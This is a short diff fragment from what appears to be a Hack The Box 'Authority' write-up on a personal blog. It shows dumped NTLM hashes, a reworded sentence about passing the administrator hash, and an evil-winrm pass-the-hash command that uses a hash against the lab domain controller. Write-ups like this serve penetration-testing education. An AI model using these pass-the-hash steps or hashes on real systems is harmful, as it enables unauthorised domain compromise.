0ph3/0ph3.github.io/_posts/2024-01-08-HTB-Authority.md

 HACK01$:11603:aad3b435b51404eeaad3b435b51404ee:1baffafa84162a4cc0319b55853b94e9:::
 [*] Cleaning up...
 ```
-Passing the hash gets us admin access to the DC through winRM.
+We can pass the administrator's hash using winrm to gain remote access to the DC as the administrator user, and finally, retrieve the root flag.
 ```console
 ┌─[✗]─[root@parrot]─[/htb/vpn]
 └──╼ #evil-winrm -i 10.10.11.222 --user Administrator -H 6961f422924da90a6928197429eea4ed